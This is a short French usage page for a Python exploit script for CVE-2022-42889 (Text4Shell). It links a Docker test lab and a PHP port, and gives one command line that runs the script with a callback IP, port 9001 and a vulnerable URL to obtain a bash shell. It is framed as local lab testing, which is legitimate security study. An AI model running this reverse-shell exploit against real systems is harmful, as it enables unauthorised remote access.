
Script Python pour CVE-2022-42889
Script Python pour CVE-2022-42889
Pour tester cela localement, suivez le POC Docker: https://github.com/karthikuj/cve-2022-42889-text4shell-docker
Pour une version PHP de ceci: https://github.com/ClickCyber/cve-2022-42889
Si vous exécutez ceci et l'exploitez localement, l'IP que vous devez utiliser est la passerelle générée lors de la création du conteneur Docker.
Après avoir obtenu un shell bash sur le conteneur Docker

Assurez-vous de rendre le script exécutable avec chmod
./cve-2022-42889.py 172.17.0.1 9001 'http://localhost/text4shell/attack?search='

NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-42889